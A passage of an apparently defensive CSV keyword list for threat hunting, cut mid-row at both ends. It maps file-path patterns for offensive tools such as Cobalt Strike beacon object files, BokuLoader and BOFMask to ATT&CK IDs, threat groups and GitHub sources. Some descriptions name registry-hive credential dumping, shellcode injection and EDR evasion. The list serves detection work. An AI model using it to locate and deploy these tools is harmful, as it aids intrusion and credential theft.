APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*/bof.x64.o*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof.x64.o*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof.x86.o*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof.x86.o*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof/bof.c","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof/bof.vcxproj*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof/IABOF*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*/bof/IAStart.asm*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*/BOF-Builder*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*/bof-collection/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/bofhound.git*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/BOFMask.git*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" +"*/bofmask.h*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" +"*/BOFNETExamples/*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*/BOF-RegSave*","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*/BofRunner.cs*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/BOFs.git*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" +"*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/boko.py*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*/boku7/spawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/boku7/whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*/BokuLoader.c*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader.h*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 